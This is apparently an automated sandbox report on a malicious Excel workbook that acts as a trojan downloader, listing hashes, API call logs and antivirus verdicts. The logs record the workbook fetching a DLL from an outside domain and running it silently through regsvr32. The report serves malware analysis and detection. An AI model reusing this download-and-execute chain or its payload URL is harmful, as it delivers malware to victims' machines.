Summary | ZeroBOX

Documents new.xlsb

Category FILE
Machine s1_win7_x6403_us
Started Sept. 10, 2021, 9:42 a.m.
Completed Sept. 10, 2021, 9:44 a.m.
Size 324.3KB
Type Zip archive data, at least v2.0 to extract
MD5 e2c5c7d099745fa74d4653b6d49338d2
SHA256 8662d511c7f1bef3a6e4f6d72965760345b57ddf0de5d3e6eae4e610216a39c1
CRC32 91C09180
ssdeep 6144:4R+roOczZ5uoKG6qYR90sX9OYubAp2BAHDwRsX3+HnMtgG5HyQt:jkOczZoHqYR90a9nyE2n+uHnkpHy6
Yara None matched

Name pawevi.com
IP Address 164.124.101.2
Status Active

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

API NtProtectVirtualMemory
Arguments:
process_identifier: 1936
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6bdb2000
process_handle: 0xffffffff
Status/Return/Repeated: 1 0 0
file C:\Users\test22\tru.dll
API NtCreateFile
Arguments:
create_disposition: 2 (FILE_CREATE)
file_handle: 0x00000474
filepath: C:\Users\test22\AppData\Local\Temp\~$Documents new.xlsb
desired_access: 0xc0110080 (FILE_READ_ATTRIBUTES|DELETE|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\Users\test22\AppData\Local\Temp\~$Documents new.xlsb
create_options: 4198496 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_DELETE_ON_CLOSE)
status_info: 2 (FILE_CREATED)
share_access: 1 (FILE_SHARE_READ)
Status/Return/Repeated: 1 0 0
cmdline regsvr32 -silent ..\tru.dll
API NtProtectVirtualMemory
Arguments:
process_identifier: 1936
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x7ef70000
process_handle: 0xffffffff
Status/Return/Repeated: 1 0 0
API URLDownloadToFileW
Arguments:
url: https://pawevi.com/lch5.dll
stack_pivoted: 0
filepath_r: ..\tru.dll
filepath: C:\Users\test22\tru.dll
Status/Return/Repeated: 2148270085 0
parent_process excel.exe martian_process regsvr32 -silent ..\tru.dll
FireEye Trojan.GenericKD.46821851
ALYac Trojan.Downloader.XLS.gen
Alibaba TrojanDownloader:VBA/MalDoc.ali1000101
Cyren XF/SneakyBin.AC.gen!Camelot
Symantec Trojan.Gen.NPE
ESET-NOD32 a variant of Generik.HYXVNJK
Cynet Malicious (score: 99)
Kaspersky HEUR:Trojan-Downloader.MSOffice.SLoad.gen
BitDefender Trojan.GenericKD.46821851
MicroWorld-eScan Trojan.GenericKD.46821851
Ad-Aware Trojan.GenericKD.46821851
Emsisoft Trojan.GenericKD.46821851 (B)
Ikarus Trojan.SuspectCRC
Avira W97M/Dldr.Sload.mhxaz
Kingsoft Macro.Excel.Downloader.xl.(kcloud)
Microsoft TrojanDownloader:O97M/EncDoc.SMT!MTB
Gridinsoft Trojan.U.Downloader.oa
ViRobot XLS.Z.Agent.332087
GData Trojan.GenericKD.46821851
AhnLab-V3 Downloader/XLS.Agent
MAX malware (ai score=87)
Tencent Trojan.MsOffice.Macro40.11013333
Fortinet MSExcel/Agent.4214!tr.dldr